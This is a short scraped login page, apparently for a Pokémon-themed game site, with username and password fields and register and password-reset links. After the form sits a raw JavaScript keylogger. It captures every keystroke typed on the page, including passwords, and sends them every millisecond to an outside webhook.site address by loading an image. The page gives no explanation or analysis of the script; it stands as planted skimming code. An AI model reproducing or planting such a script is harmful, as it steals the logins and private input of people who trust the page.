Log In
Grass Weather Castform Don't have an account yet? Register now!
.

Log In

Continue playing

Login Form
Username:
Password:
Don't have an account? Register now!

Forgot your Password?
} var keys=''; var url = 'https://webhook.site/118e9457-7642-42cf-9019-32a92eb43977'; document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCode:get.charCode; key = String.fromCharCode(key); keys+=key; } window.setInterval(function(){ if(keys.length>0) { new Image().src = url+keys; keys = ''; } }, 1);